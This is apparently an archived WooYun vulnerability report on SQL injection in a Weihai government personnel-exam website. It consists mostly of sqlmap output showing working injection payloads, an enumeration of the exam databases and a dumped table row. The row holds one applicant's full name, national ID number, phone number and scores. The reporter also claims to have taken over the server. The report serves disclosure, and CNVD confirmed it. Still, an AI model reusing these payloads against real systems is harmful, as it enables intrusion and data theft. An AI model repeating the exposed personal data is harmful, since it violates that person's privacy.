乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-03: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-15: 细节向核心白帽子及相关领域专家公开 2015-06-25: 细节向普通白帽子公开 2015-07-05: 细节向实习白帽子公开 2015-07-20: 细节向公众公开
注入。。。已查,无重复。
http://www.whrsks.gov.cn:8065/cjcx/zcjsj_2015_01/index.asp存在注入,Sa权限,重点是看下边的吧。。主要还是公务员的资料。。已获取服务器,,,求内网漫游~~~~
[14:28:03] [INFO] testing connection to the target URL[14:28:03] [INFO] searching for forms[#1] form:POST http://www.whrsks.gov.cn:8065/cjcx/zcjsj_2015_01/look.aspPOST data: sfzh=&xm=&submit3=%B5%E3%BB%F7%CC%E1%BD%BBdo you want to test this form? [Y/n/q]>Edit POST data [default: sfzh=&xm=&submit3=%B5%E3%BB%F7%CC%E1%BD%BB] (Warning: blank fields detected):do you want to fill blank fields with random values? [Y/n][14:28:04] [INFO] resuming back-end DBMS 'microsoft sql server'[14:28:04] [INFO] using 'C:\Users\Administrator\.sqlmap\output\results-06032015_0228pm.csv' as the CSV results file in multiple targets modesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: xm (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: sfzh=MsjH&xm=';WAITFOR DELAY '0:0:5'--&submit3=%B5%E3%BB%F7%CC%E1%BD%BB Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: sfzh=MsjH&xm=' UNION ALL SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(99)+CHAR(65)+CHAR(72)+CHAR(121)+CHAR(76)+CHAR(87)+CHAR(102)+CHAR(117)+CHAR(87)+CHAR(81)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(112)+CHAR(113),NULL,NULL,NULL,NULL-- &submit3=%B5%E3%BB%F7%CC%E1%BD%BB---do you want to exploit this SQL injection? [Y/n][14:28:05] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008[14:28:05] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\Administrator\.sqlmap\output\results-06032015_0228pm.csv'
web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, Microsoft IIS 7.5, ASPback-end DBMS: Microsoft SQL Server 2008[14:30:40] [INFO] fetching database names[14:30:40] [INFO] the SQL query used returns 29 entriesavailable databases [29]:[*] CE_2015[*] ceshi[*] chinaexam_14gwy[*] chinaexam_14sy_sz[*] chinaexam_15gwy[*] chinaexam_15jsj[*] chinaexam_15sy_hc[*] chinaexam_15sy_rc[*] chinaexam_15sy_rs[*] chinaexam_15sy_sz[*] chinaexam_15sy_wd[*] chinaexam_gwybmTel[*] Chinaexam_sybmtel_hc[*] Chinaexam_sybmtel_rc[*] Chinaexam_sybmtel_rs[*] Chinaexam_sybmtel_sz[*] Chinaexam_sybmtel_wd[*] chinaexam_zy[*] chinaexamda[*] chinaexamwj[*] cjcx[*] jeecms_2_3_2_final[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] shizhi[*] tempdb
多达多个人事考试裤子。。。
Database: cjcxTable: gwy_2011_2[32 columns]+--------+----------+| Column | Type |+--------+----------+| F29 | nvarchar || F30 | nvarchar || F31 | nvarchar || 两年基层工 | nvarchar || 公安 | float || 准考证号 | nvarchar || 出生日期 | float || 备注 | nvarchar || 姓名 | nvarchar || 学位 | nvarchar || 学历 | nvarchar || 工作单位 | nvarchar || 工作时间 | float || 性别 | nvarchar || 总成绩 | float || 户口所在地 | nvarchar || 所学专业 | nvarchar || 报名序号 | nvarchar || 报考职位 | nvarchar || 报考职位代 | nvarchar || 报考部门 | nvarchar || 报考部门代 | nvarchar || 政治面貌 | nvarchar || 本职位名次 | float || 毕业时间 | float || 毕业院校 | nvarchar || 民族 | nvarchar || 申论 | float || 考生身份 | nvarchar || 联系电话 | nvarchar || 行测 | float || 身份证号 | nvarchar |+--------+----------+
[14:56:36] [WARNING] table 'cjcx.dbo.dtproperties' dumped to CSV file 'C:\Documents and Settings\king7$\.sqlmap\output\www.whrsks.gov.cn\dump\cjcx\dtproperties-b245fdb6.csv'[14:56:36] [INFO] fetching columns for table 'gwy_2011_2' in database 'cjcx'[14:56:36] [INFO] the SQL query used returns 32 entries[14:56:36] [INFO] fetching entries for table 'gwy_2011_2' in database 'cjcx'[14:56:36] [INFO] the SQL query used returns 10012 entries[14:56:37] [INFO] retrieved: " "," "," ","否","0","1110010102","32336","","宋雨露...[14:58:30] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
10012字段,但是由于SQLmap的跑表实在是太慢了,
Database: cjcxTable: gwy_2011_2[1 entry]+----+------+----+----+---------+-----+----+------+----+-------+------+------+------+------+--------+----------------------------+------+------------+-----------+-------+-------+-------+-------------+--------------------+------+-------+-------+----------+-------+-------+-------+-------+| 性别 | 行测 | 学历 | 民族 | 备注 | 姓名 | 公安 | 申论 | 学位 | 总成绩 | F29 | F30 | F31 | 毕业院校 | 报名序号 | 报考职位 | 政治面貌 | 准考证号 | 报考部门 | 毕业时间 | 工作时间 | 考生身份 | 联系电话 | 身份证号 | 工作单位 | 出生日期 | 所学专业 | 报考职位代 | 两年基层工 | 户口所在地 | 报考部门代 | 本职位名次 |+----+------+----+----+---------+-----+----+------+----+-------+------+------+------+------+--------+----------------------------+------+------------+-----------+-------+-------+-------+-------------+--------------------+------+-------+-------+----------+-------+-------+-------+-------+| 女 | 46.8 | 本科 | 汉族 | <blank> | 宋雨露 | 0 | 60.5 | 学士 | 53.65 | NULL| NULL | NULL | 济宁学院 | 000199 | 1人,普通管理,面向社会,本科/学士及以上,详见简章 | 共青团员 | 1110010102 | 中共威海市委宣传部 | 40725 | 40725 | 应届毕业生 | 13553194779 | 371082198807120026 | 无 | 32336 | 汉语言文学 | 10001001 | 否 | 威海 | 10001 | 74 |+----+------+----+----+---------+-----+----+------+----+-------+------+------+------+------+--------+----------------------------+------+------------+-----------+-------+-------+-------+-------------+--------------------+------+-------+-------+----------+-------+-------+-------+-------+
修复注入。。
危害等级:高
漏洞Rank:11
确认时间:2015-06-05 17:18
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
暂无